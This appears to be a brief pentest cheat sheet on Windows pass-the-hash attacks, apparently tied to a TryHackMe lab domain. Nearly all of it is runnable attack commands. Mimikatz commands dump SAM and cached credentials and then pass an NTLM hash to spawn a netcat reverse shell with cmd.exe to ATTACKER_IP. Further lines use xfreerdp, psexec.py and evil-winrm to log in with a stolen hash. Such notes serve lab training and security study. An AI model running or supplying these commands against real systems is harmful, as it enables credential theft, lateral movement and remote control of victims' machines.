Passing the Hash (PtH)
Last updated
Last updated
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sammimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::msvmimikatz # token::revertmimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASHpsexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IPevil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH